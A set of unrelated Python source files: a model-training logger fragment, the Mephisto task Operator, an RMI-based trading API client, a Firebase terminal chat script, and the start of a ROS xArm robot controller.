def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch, results):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *(f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R'))]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
operator.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import shutil
import json
import os
import tempfile
import time
import threading
import shlex
import traceback
import signal
from argparse import ArgumentParser
from mephisto.operations.supervisor import Supervisor, Job
from typing import Dict, Optional, List, Any, Tuple, NamedTuple, Type, TYPE_CHECKING
from mephisto.data_model.task_config import TaskConfig
from mephisto.data_model.task_run import TaskRun
from mephisto.data_model.requester import Requester
from mephisto.abstractions.blueprint import OnboardingRequired, SharedTaskState
from mephisto.abstractions.database import MephistoDB, EntryDoesNotExistException
from mephisto.data_model.qualification import make_qualification_dict, QUAL_NOT_EXIST
from mephisto.operations.task_launcher import TaskLauncher
from mephisto.operations.registry import (
get_blueprint_from_type,
get_crowd_provider_from_type,
get_architect_from_type,
)
from mephisto.operations.utils import get_mock_requester
from mephisto.operations.logger_core import get_logger, set_mephisto_log_level
from omegaconf import DictConfig, OmegaConf
logger = get_logger(name=__name__)
if TYPE_CHECKING:
from mephisto.data_model.agent import Agent
from mephisto.abstractions.blueprint import Blueprint, TaskRunner
from mephisto.abstractions.crowd_provider import CrowdProvider
from mephisto.abstractions.architect import Architect
from argparse import Namespace
RUN_STATUS_POLL_TIME = 10
class TrackedRun(NamedTuple):
task_run: TaskRun
architect: "Architect"
task_runner: "TaskRunner"
task_launcher: TaskLauncher
job: Job
class Operator:
"""
Acting as the controller behind the curtain, the Operator class
is responsible for managing the knobs, switches, and dials
of the rest of the Mephisto architecture.
Most convenience scripts for using Mephisto will use an Operator
to get the job done, though this class itself is also a
good model to use to understand how the underlying
architecture works in order to build custom jobs or workflows.
"""
def __init__(self, db: "MephistoDB"):
self.db = db
self.supervisor = Supervisor(db)
self._task_runs_tracked: Dict[str, TrackedRun] = {}
self.is_shutdown = False
self._run_tracker_thread = threading.Thread(
target=self._track_and_kill_runs, name="Operator-tracking-thread"
)
self._run_tracker_thread.start()
@staticmethod
def _get_baseline_argparser() -> ArgumentParser:
"""Return a parser for the baseline requirements to launch a job"""
parser = ArgumentParser()
parser.add_argument(
"--blueprint-type",
dest="blueprint_type",
help="Name of the blueprint to launch",
required=True,
)
parser.add_argument(
"--architect-type",
dest="architect_type",
help="Name of the architect to launch with",
required=True,
)
parser.add_argument(
"--requester-name",
dest="requester_name",
help="Identifier for the requester to launch as",
required=True,
)
return parser
def get_running_task_runs(self):
"""Return the currently running task runs and their handlers"""
return self._task_runs_tracked.copy()
def parse_and_launch_run(
self,
arg_list: Optional[List[str]] = None,
extra_args: Optional[Dict[str, Any]] = None,
) -> Optional[str]:
"""
Wrapper around parse and launch run that prints errors on failure, rather
than throwing. Generally for use in scripts.
"""
raise Exception(
"Operator.parse_and_launch_run has been deprecated in favor "
"of using Hydra for argument configuration. See the docs at "
"https://github.com/facebookresearch/Mephisto/blob/master/docs/hydra_migration.md "
"in order to upgrade."
)
def validate_and_run_config_or_die(
self, run_config: DictConfig, shared_state: Optional[SharedTaskState] = None
) -> str:
"""
Parse the given arguments and launch a job.
"""
set_mephisto_log_level(level=run_config.get("log_level", "info"))
if shared_state is None:
shared_state = SharedTaskState()
# First try to find the requester:
requester_name = run_config.provider.requester_name
requesters = self.db.find_requesters(requester_name=requester_name)
if len(requesters) == 0:
if run_config.provider.requester_name == "MOCK_REQUESTER":
requesters = [get_mock_requester(self.db)]
else:
raise EntryDoesNotExistException(
f"No requester found with name {requester_name}"
)
requester = requesters[0]
requester_id = requester.db_id
provider_type = requester.provider_type
assert provider_type == run_config.provider._provider_type, (
f"Found requester for name {requester_name} is not "
f"of the specified type {run_config.provider._provider_type}, "
f"but is instead {provider_type}."
)
# Next get the abstraction classes, and run validation
# before anything is actually created in the database
blueprint_type = run_config.blueprint._blueprint_type
architect_type = run_config.architect._architect_type
BlueprintClass = get_blueprint_from_type(blueprint_type)
ArchitectClass = get_architect_from_type(architect_type)
CrowdProviderClass = get_crowd_provider_from_type(provider_type)
BlueprintClass.assert_task_args(run_config, shared_state)
ArchitectClass.assert_task_args(run_config, shared_state)
CrowdProviderClass.assert_task_args(run_config, shared_state)
# Find an existing task or create a new one
task_name = run_config.task.get("task_name", None)
if task_name is None:
task_name = blueprint_type
logger.warning(
f"Task is using the default blueprint name {task_name} as a name, "
"as no task_name is provided"
)
tasks = self.db.find_tasks(task_name=task_name)
task_id = None
if len(tasks) == 0:
task_id = self.db.new_task(task_name, blueprint_type)
else:
task_id = tasks[0].db_id
logger.info(f"Creating a task run under task name: {task_name}")
# Create a new task run
new_run_id = self.db.new_task_run(
task_id,
requester_id,
json.dumps(OmegaConf.to_yaml(run_config, resolve=True)),
provider_type,
blueprint_type,
requester.is_sandbox(),
)
task_run = TaskRun(self.db, new_run_id)
try:
# Register the blueprint with args to the task run,
# ensure cached
blueprint = task_run.get_blueprint(
args=run_config, shared_state=shared_state
)
# If anything fails after here, we have to cleanup the architect
build_dir = os.path.join(task_run.get_run_dir(), "build")
os.makedirs(build_dir, exist_ok=True)
architect = ArchitectClass(
self.db, run_config, shared_state, task_run, build_dir
)
# Setup and deploy the server
built_dir = architect.prepare()
task_url = architect.deploy()
# TODO(#102) maybe the cleanup (destruction of the server configuration?) should only
# happen after everything has already been reviewed, this way it's possible to
# retrieve the exact build directory to review a task for real
architect.cleanup()
# Create the backend runner
task_runner = BlueprintClass.TaskRunnerClass(
task_run, run_config, shared_state
)
# Small hack for auto appending block qualification
existing_qualifications = shared_state.qualifications
if run_config.blueprint.get("block_qualification", None) is not None:
existing_qualifications.append(
make_qualification_dict(
run_config.blueprint.block_qualification, QUAL_NOT_EXIST, None
)
)
if run_config.blueprint.get("onboarding_qualification", None) is not None:
existing_qualifications.append(
make_qualification_dict(
OnboardingRequired.get_failed_qual(
run_config.blueprint.onboarding_qualification
),
QUAL_NOT_EXIST,
None,
)
)
shared_state.qualifications = existing_qualifications
# Register the task with the provider
provider = CrowdProviderClass(self.db)
provider.setup_resources_for_task_run(
task_run, run_config, shared_state, task_url
)
initialization_data_iterable = blueprint.get_initialization_data()
# Link the job together
job = self.supervisor.register_job(
architect, task_runner, provider, existing_qualifications
)
if self.supervisor.sending_thread is None:
self.supervisor.launch_sending_thread()
except (KeyboardInterrupt, Exception) as e:
logger.error(
"Encountered error while launching run, shutting down", exc_info=True
)
try:
architect.shutdown()
except (KeyboardInterrupt, Exception) as architect_exception:
logger.exception(
f"Could not shut down architect: {architect_exception}",
exc_info=True,
)
raise e
launcher = TaskLauncher(
self.db,
task_run,
initialization_data_iterable,
max_num_concurrent_units=run_config.task.max_num_concurrent_units,
)
launcher.create_assignments()
launcher.launch_units(task_url)
self._task_runs_tracked[task_run.db_id] = TrackedRun(
task_run=task_run,
task_launcher=launcher,
task_runner=task_runner,
architect=architect,
job=job,
)
task_run.update_completion_progress(status=False)
return task_run.db_id
def _track_and_kill_runs(self):
"""
Background thread that shuts down servers when a task
is fully done.
"""
while not self.is_shutdown:
runs_to_check = list(self._task_runs_tracked.values())
for tracked_run in runs_to_check:
task_run = tracked_run.task_run
if tracked_run.task_launcher.finished_generators is False:
# If the run can still generate assignments, it's
# definitely not done
continue
task_run.update_completion_progress(
task_launcher=tracked_run.task_launcher
)
if not task_run.get_is_completed():
continue
else:
self.supervisor.shutdown_job(tracked_run.job)
tracked_run.architect.shutdown()
tracked_run.task_launcher.shutdown()
del self._task_runs_tracked[task_run.db_id]
time.sleep(RUN_STATUS_POLL_TIME)
def force_shutdown(self, timeout=5):
"""
Force a best-effort shutdown of everything, letting no individual
shutdown step suspend for more than the timeout before moving on.
Skips waiting for in-flight assignments to rush the shutdown.
** Should only be used in sandbox or test environments. **
"""
self.is_shutdown = True
def end_launchers_and_expire_units():
for tracked_run in self._task_runs_tracked.values():
tracked_run.task_launcher.shutdown()
tracked_run.task_launcher.expire_units()
def end_architects():
for tracked_run in self._task_runs_tracked.values():
tracked_run.architect.shutdown()
def shutdown_supervisor():
if self.supervisor is not None:
self.supervisor.shutdown()
tasks = {
"expire-units": end_launchers_and_expire_units,
"kill-architects": end_architects,
"fire-supervisor": shutdown_supervisor,
}
for tname, t in tasks.items():
shutdown_thread = threading.Thread(target=t, name=f"force-shutdown-{tname}")
shutdown_thread.start()
start_time = time.time()
while time.time() - start_time < timeout and shutdown_thread.is_alive():
time.sleep(0.5)
if not shutdown_thread.is_alive():
# Only join if the shutdown fully completed
shutdown_thread.join()
def shutdown(self, skip_input=True):
logger.info("operator shutting down")
self.is_shutdown = True
runs_to_check = list(self._task_runs_tracked.items())
for run_id, tracked_run in runs_to_check:
logger.info(f"Expiring units for task run {run_id}.")
try:
tracked_run.task_launcher.shutdown()
except (KeyboardInterrupt, SystemExit) as e:
logger.info(
f"Skipping waiting for launcher threads to join on task run {run_id}."
)
def cant_cancel_expirations(self, sig, frame):
logging.warn(
"Ignoring ^C during unit expirations. ^| if you NEED to exit and you will "
"clean up units that hadn't been expired afterwards."
)
old_handler = signal.signal(signal.SIGINT, cant_cancel_expirations)
tracked_run.task_launcher.expire_units()
signal.signal(signal.SIGINT, old_handler)
try:
remaining_runs = self._task_runs_tracked.values()
while len(remaining_runs) > 0:
next_runs = []
for tracked_run in remaining_runs:
if tracked_run.task_run.get_is_completed():
tracked_run.architect.shutdown()
else:
next_runs.append(tracked_run)
if len(next_runs) > 0:
logger.info(
f"Waiting on {len(remaining_runs)} task runs with assignments in-flight "
f"Ctrl-C ONCE to kill running tasks and FORCE QUIT."
)
time.sleep(30)
remaining_runs = next_runs
except Exception as e:
logger.exception(
f"Encountered problem during shutting down {e}", exc_info=True
)
import traceback
traceback.print_exc()
except (KeyboardInterrupt, SystemExit) as e:
logger.info(
"Skipping waiting for outstanding task completions, shutting down servers now!"
)
for tracked_run in remaining_runs:
logger.info(
f"Shutting down Architect for task run {tracked_run.task_run.db_id}"
)
tracked_run.architect.shutdown()
finally:
self.supervisor.shutdown()
self._run_tracker_thread.join()
def validate_and_run_config(
self, run_config: DictConfig, shared_state: Optional[SharedTaskState] = None
) -> Optional[str]:
"""
Wrapper around validate_and_run_config_or_die that prints errors on
failure, rather than throwing. Generally for use in scripts.
"""
try:
return self.validate_and_run_config_or_die(
run_config=run_config, shared_state=shared_state
)
except (KeyboardInterrupt, Exception) as e:
logger.error("Ran into error while launching run: ", exc_info=True)
return None
def parse_and_launch_run_wrapper(
self,
arg_list: Optional[List[str]] = None,
extra_args: Optional[Dict[str, Any]] = None,
) -> Optional[str]:
"""
Wrapper around parse and launch run that prints errors on failure, rather
than throwing. Generally for use in scripts.
"""
raise Exception(
"Operator.parse_and_launch_run_wrapper has been deprecated in favor "
"of using Hydra for argument configuration. See the docs at "
"https://github.com/facebookresearch/Mephisto/blob/master/docs/hydra_migration.md "
"in order to upgrade."
)
def print_run_details(self):
"""Print details about running tasks"""
# TODO(#93) parse these tasks and get the full details
for task in self.get_running_task_runs():
logger.info(f"Operator running task ID = {task}")
def wait_for_runs_then_shutdown(
self, skip_input=False, log_rate: Optional[int] = None
) -> None:
"""
Wait for task_runs to complete, and then shutdown.
Set log_rate to get print statements of currently running tasks
at the specified interval
"""
try:
try:
last_log = 0.0
while len(self.get_running_task_runs()) > 0:
if log_rate is not None:
if time.time() - last_log > log_rate:
last_log = time.time()
self.print_run_details()
time.sleep(RUN_STATUS_POLL_TIME)
except Exception as e:
if skip_input:
raise e
traceback.print_exc()
should_quit = input(
"The above exception happened while running a task, do "
"you want to shut down? (y)/n: "
)
if should_quit not in ["n", "N", "no", "No"]:
raise e
except Exception as e:
import traceback
traceback.print_exc()
except (KeyboardInterrupt, SystemExit) as e:
logger.exception(
"Cleaning up after keyboard interrupt, please wait!", exc_info=True
)
finally:
self.shutdown()
|
geyaApi.py
|
# encoding: utf-8
import urllib
import hashlib
import os
import jpype
from jpype import *
import math
import requests
from Queue import Queue, Empty
from threading import Thread
from time import sleep
LHANG_API_ROOT = "https://api.lhang.com/v1/"
FUNCTION_TICKER = 'FUNCTION_TICKER'
FUNCTION_ALL_TICKER = 'FUNCTION_ALL_TICKER'
FUNCTION_CREATEORDER = 'FUNCTION_CREATEORDER'
########################################################################
class GeyaBase(object):
""""""
DEBUG = True
# ----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.apiKey = ''
self.secretKey = ''
self.interval = 1 # 每次请求的间隔等待
self.active = False # API工作状态
self.reqID = 0 # 请求编号
self.reqQueue = Queue() # 请求队列
self.reqThread = Thread(target=self.processQueue) # 请求处理线程
# ----------------------------------------------------------------------
def init(self):
"""初始化"""
self.active = True
self.reqThread.start()
# ----------------------------------------------------------------------
def exit(self):
"""退出"""
self.active = False
if self.reqThread.isAlive():
self.reqThread.join()
# ----------------------------------------------------------------------
# 需要进行改造,该接口需要进行高度抽象
def processRequest(self, req):
"""处理请求"""
# 读取方法和参数
method = req['function']
params = req['params']
# url = LHANG_API_ROOT + api
if method == FUNCTION_TICKER: # 查询平盘最优额度
r = self.queryTradePrice(params)
elif method == FUNCTION_ALL_TICKER: # 查询平盘全部额度,调用该服务结束后直接返回,因为该接口应答报文没有错误码
r = self.queryAllTradePrice(params)
data = {'code': '00000', 'resList': r}
return data
elif method == FUNCTION_CREATEORDER: # 平盘交易
r = self.coverTrade(params)
if r.code == '00000':
if method == FUNCTION_TICKER:#查询最优平盘额度
data = {'code': r.code, 'message': r.message, 'exnm': r.exnm, 'tradeSide': r.tradeSide, 'status': r.status,
'tradeLimitAmount': r.tradeLimitAmount, 'price': r.price}
elif method == FUNCTION_CREATEORDER: # 平盘交易,返回报文中可能有多条成交记录
data = {'code': r.code, 'message': r.message, 'trsn': r.trsn, 'exnm': r.exnm, 'prcd': r.prcd,
'direction': params['tradeSide'], 'details': r.details}
else:
data = None
return data
# ----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
req = self.reqQueue.get(block=True, timeout=1) # 获取请求的阻塞为一秒
#req = self.reqQueue.get(block=False) # 获取请求的阻塞为一秒
if req is None:
continue
callback = req['callback']
reqID = req['reqID']
#判断java虚拟机是否启动,未启动则启动
if jpype.isJVMStarted() == False:
# 启动java虚拟机
jarpath = os.path.join(os.path.abspath('.'), 'RmiInterface.jar')
print jarpath
print jpype.getDefaultJVMPath()
#jpype.startJVM(jpype.getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
jpype.startJVM(jpype.getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
data = self.processRequest(req)
# 请求失败
if data is None:
error = u'请求失败'
self.onError(error, req, reqID)
# 请求成功
elif data['code'] == '00000':
if self.DEBUG:
print callback.__name__
callback(data, req, reqID)
# 请求失败
else:
error = u'请求出错,错误代码:%s' % data['code']
self.onError(error, req, reqID)
#finally:
# jpype.shutdownJVM()
# 流控等待
#sleep(self.interval)
except Empty:
pass
except jpype.JavaException, ex:
print ex.javaClass(),ex.message()
print ex.stacktrace()
# ----------------------------------------------------------------------
def sendRequest(self, function, params, callback):
"""发送请求"""
# 请求编号加1
self.reqID += 1
# 生成请求字典并放入队列中
req = {}
req['function'] = function
req['params'] = params
req['callback'] = callback
req['reqID'] = self.reqID
self.reqQueue.put(req)
# 返回请求编号
return self.reqID
# ----------------------------------------------------------------------
def onError(self, error, req, reqID):
"""错误推送"""
print error, req, reqID
###############################################
# 行情接口
###############################################
# ----------------------------------------------------------------------
def getTicker(self, symbol, direction, rmiIp, rmiPort):
"""#查询平盘最优额度"""
function = FUNCTION_TICKER
params = {'symbol': symbol,
'direction': direction,
'rmiIp': rmiIp,
'rmiPort': rmiPort}
callback = self.onGetTicker
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getDepth(self, symbol, rmiIp, rmiPort):
"""查询深度"""
function = FUNCTION_ALL_TICKER
params = {
'symbol': symbol,
'rmiIp': rmiIp,
'rmiPort': rmiPort}
callback = self.onGetDepth
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetTicker(self, data, req, reqID):
"""查询行情回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetDepth(self, data, req, reqID):
"""查询深度回调"""
print data, reqID
# ----------------------------------------------------------------------
def onGetTrades(self, data, req, reqID):
"""查询历史成交"""
print data, reqID
# ----------------------------------------------------------------------
def onGetKline(self, data, req, reqID):
"""查询K线回报"""
print data, reqID
###############################################
# 交易接口
###############################################
# ----------------------------------------------------------------------
def createOrder(self, serial, prcd, exnm, reqDate, reqTime, volume, ppds, tradeSide, akpc, rrdc):
"""发送委托"""
function = FUNCTION_CREATEORDER
params = {
'serial': serial,
'prcd': prcd,
'exnm': exnm,
'reqDate': reqDate,
'reqTime': reqTime,
'volume': volume,
'ppds': ppds,
'tradeSide': tradeSide,
'akpc': akpc,
'rrdc': rrdc
}
callback = self.onCreateTrade
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def cancelOrder(self, symbol, orderId):
"""撤单"""
function = FUNCTION_CANCELORDER
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onCancelOrder
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfo(self, symbol, orderId):
"""查询委托"""
function = FUNCTION_ORDERSINFO
params = {
'symbol': symbol,
'order_id': orderId
}
callback = self.onGetOrdersInfo
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def getOrdersInfoHistory(self, symbol, status, currentPage, pageLength):
"""撤单"""
function = FUNCTION_ORDERSINFOHISTORY
params = {
'symbol': symbol,
'status': status,
'current_page': currentPage,
'page_length': pageLength
}
callback = self.onGetOrdersInfoHistory
return self.sendRequest(function, params, callback)
# ----------------------------------------------------------------------
def onGetUserInfo(self, data, req, reqID):
"""查询账户信息"""
print data, reqID
# ----------------------------------------------------------------------
def onCreateOrder(self, data, req, reqID):
"""委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onCancelOrder(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfo(self, data, req, reqID):
"""查询委托回报"""
print data, reqID
# ----------------------------------------------------------------------
def onGetOrdersInfoHistory(self, data, req, reqID):
"""撤单回报"""
print data, reqID
# 调用自动平盘平台的查询平盘最优额度接口
# def queryTradePrice(self, exnm, tradeSide, rmiIp, rmiPort):
def queryTradePrice(self, params):
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CheckHydraTradeInfoRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoRequest')
# CheckHydraTradeInfoResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoResponse')
TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# python调用java接口
remoteObj = namingContext.lookup(
"rmi://" + params['rmiIp'] + ":" + params['rmiPort'] + "/HydraTradeService")
request = CheckHydraTradeInfoRequest()
request.setExnm(params['symbol'])
if params['direction'] == "BUY":
request.setTradeSide(TradeSide.BUY)
elif params['direction'] == "SELL":
request.setTradeSide(TradeSide.SELL)
resp = remoteObj.sendCheckForDeal(request)
return resp
# 调用自动平盘平台的查询全部平盘额度
def queryAllTradePrice(self, params):
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CheckHydraTradeAllInfoRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeAllInfoRequest')
# CheckHydraTradeInfoResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CheckHydraTradeInfoResponse')
# TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# python调用java接口
remoteObj = namingContext.lookup(
"rmi://" + params['rmiIp'] + ":" + params['rmiPort'] + "/HydraTradeService")
request = CheckHydraTradeAllInfoRequest()
request.setExnm(params['symbol'])
resp = remoteObj.sendCheckForDealAll(request)
return resp
# 调用自动平盘平台的平盘交易接口
def coverTrade(self, params):
# jarpath = os.path.join(os.path.abspath('.'), 'RmiInterface.jar')
# startJVM(getDefaultJVMPath(), "-ea", "-Djava.class.path=%s" % jarpath)
Context = jpype.javax.naming.Context
InitialContext = jpype.javax.naming.InitialContext
namingContext = InitialContext()
IHydraTradeService = jpype.JClass('com.cmbc.hydra.rmi.service.IHydraTradeService')
CallHydraTradeRequest = jpype.JClass('com.cmbc.hydra.rmi.bean.CallHydraTradeRequest')
CallHydraTradeResponse = jpype.JClass('com.cmbc.hydra.rmi.bean.CallHydraTradeResponse')
TradeSide = jpype.JClass('com.cmbc.hydra.rmi.bean.TradeSide')
# python调用java接口
remoteObj = namingContext.lookup(
"rmi://" + self.gateway.rmiIp + ":" + self.gateway.rmiPort + "/HydraTradeService")
rmiRequst = CallHydraTradeRequest()
rmiRequst.setTrsn(params['serial'])
rmiRequst.setPrcd(params['prcd'])
rmiRequst.setRqdt(params['reqDate'])
rmiRequst.setRqtm(params['reqTime'])
rmiRequst.setPpds(params['ppds'])
rmiRequst.setExnm(params['exnm']) # 可能需要转换
if params['tradeSide'] == "BUY":
rmiRequst.setTradeSide(TradeSide.BUY)
elif params['tradeSide'] == "SELL":
rmiRequst.setTradeSide(TradeSide.SELL)
BigDecimal = jpype.java.math.BigDecimal
rmiRequst.setAmut(BigDecimal(params['volume']))
rmiRequst.setAkpc(BigDecimal(params['akpc']))
rmiRequst.setRrdc(BigDecimal(params['rrdc']))
# resp = CheckHydraTradeInfoResponse()
resp = remoteObj.callHydraTrade(rmiRequst)
return resp
|
firebaseversion.py
|
#!/usr/bin/env python3
#doing all needed imports
from os import system
from firebase import firebase
import threading
import subprocess as s
from sys import argv
from datetime import datetime
from playsound import playsound
#we need it to that thing down here
sound = True
#here's that thing. If you don't want notification sound - turn off it!
if len(argv) > 1:
if argv[1] == "--notification-sound-off":
sound = False
#we need it to generate number for user
username = ' ' + input("Type in your username: ") + ": "
while " " in username.strip():
username = ' ' + input("Type in your username (you cannot separate words with spaces): ") + ": "
#it's "cls" for windows, here we'll clear console to everything looks ok
system("clear")
#thanks to Python code won't work if this line doesn't exist
result = "\nSEND MESSAGE\n"
#we're creating db for our messages
fb = firebase.FirebaseApplication("https://dbcfv-60641-default-rtdb.europe-west1.firebasedatabase.app/", None)
#it is our old data so we can compare it with new and messages will be updated
old_data = {}
#it's a function where we take user's input
def get_input_from_the_user():
while True:
#now we're asking for message and add user number
message = input("Type your message: ")
if "(yes)" in message:
message = message.replace("(yes)", "👍")
if "(y)" in message:
message = message.replace("(y)", "👍")
if "(no)" in message:
message = message.replace("(no)", "👎")
if "(cryingwithlaughter)" in message:
message = message.replace("(cryingwithlaughter)", "😂")
if message == "/clear":
fb.delete('Message', '')
if message.startswith("/edit"):
message_id = ""
message = message.split()
if len(message) > 3:
time_and_username = message[1] + " " + message[2]
if username.strip().startswith(message[2].strip()):
edited_message = ""
for word in message:
if message.index(word) > 2:
edited_message += word + " "
for msg in messages:
if messages[msg]["Message"].startswith(time_and_username):
message_id = msg
fb.put(f'Message/{message_id}/', 'Message', str(datetime.now().time())[:8] + username + "EDITED " + edited_message)
else: print("You can only edit your own messages.", username, message[2])
else:
Smessage = str(datetime.now().time())[:8] + username + message
#it is our data with messages
data = {
'Message':Smessage
}
#as you can see we post out message to db
fb.post('Message', data)
#thanks to this line we can do 2 things (get input and print messages) at once
thread = threading.Thread(target=get_input_from_the_user)
thread.start()
#here's our loop so we'll be able to send messages over and over again
while True:
#we're taking messages from db
messages = fb.get(f'/Message/', '')
#if messages came:
if messages:
if old_data != messages: #if sth new in messages:
try:
message = messages[list(messages.keys())[-1]]["Message"]
print(message)
author = message.split()[1].strip()
if " " + author + " " != username:
#create notification banner
s.call(['notify-send','Perfect Messenger', message])
if sound: playsound("noti2.wav") #and here's sound if it turned on
#it's "cls" for windows, here we'll clear console to everything looks ok
system('clear')
for message in messages:
print(messages[message]["Message"])
old_data = messages
print(result)
except Exception as e:
print(e)
|
xarm_controller.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import time
import threading
import xarm_servo_controller
from std_msgs.msg import Float64MultiArray
from std_srvs.srv import SetBool, SetBoolResponse
from xarm.msg import JointCmd
def RAD_2_DEG(x):
return(x * 180.0 / np.pi)
def DEG_2_RAD(x):
return(x * np.pi / 180.0)
class Joint:
'''
Basic structure to define each joint
'''
def __init__(self, id, name):
self.id = id
self.name = name
class xArmController:
'''
Send and receive commands to/from the xarm.
'''
def __init__(self, node_name="xarm_controller", port="/dev/ttyACM0"):
'''
'''
self.node_name = node_name
rospy.init_node(node_name)
#Servo control module
self.arm = xarm_servo_controller.Controller(port, debug=False)
#subscribe to joint commands
rospy.Subscriber("joint_cmd", JointCmd, self._joint_cmd_callback)
#publish the estimated joint states (this are simply interpolated)
self.joint_state_pub = rospy.Publisher("joint_states", Float64MultiArray, queue_size=10)
#joint state estimation thread.
state_estimation_thread = threading.Thread(target=self._state_estimation_thread, daemon=True)
#Arm control mode service
#Mode 1: Execution mode -> joint_cmds are sent to the xarm servos
#Mode 2: Waypoint collection mode -> commanding the servo joints is
# inactive. The xarm instead directly reads the joint state from
# the servos themselves.
self.mode_service = rospy.Service("xarm_control_mode", SetBool, self._control_mode_callback)
self.mode = "EXECUTION"
#The ID orders may be different depending on how the arm is assembled.
self.J1 = Joint(id=2, name='joint_1')
self.J2 = Joint(3, 'joint_2')
self.J3 = Joint(4, 'joint_3')
self.J4 = Joint(5, 'joint_4')
self.J5 = Joint(6, 'joint_5')
self.GRIPPER = Joint(1, 'gripper')
self.joint_list = [self.J1, self.J2, self.J3, self.J4, self.J5, self.GRIPPER]
self.joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) #radians
self.set_joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) #radians
self.set_joint_duration = np.array([1.0, 1.0, 1.0, 1.0, 1.0, 1.0]) #seconds
#zero the robotic arm
self._set_joint_positions(self.set_joint_state)
self.prev_joint_state = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
#Update a 100Hz.
self.looping_rate = rospy.Rate(100)
self.threading_looping_rate = rospy.Rate(200)
self.start_state_estimation = False
self.state_estimation_running = True
state_estimation_thread.start()
def _joint_cmd_callback(self, msg):
'''
Callback function for recieving published joint commands.
Execute the command by sending the desired joint positions to the arm.
'''
joint_positions = list(msg.joint_pos)
joint_durations = list(msg.duration)
if(self.mode == "EXECUTION"):
self._set_joint_positions(joint_positions, joint_durations)
else:
rospy.logwarn("Cannot execute joint command. xArm controller in 'WAYPOINT' collection mode.")
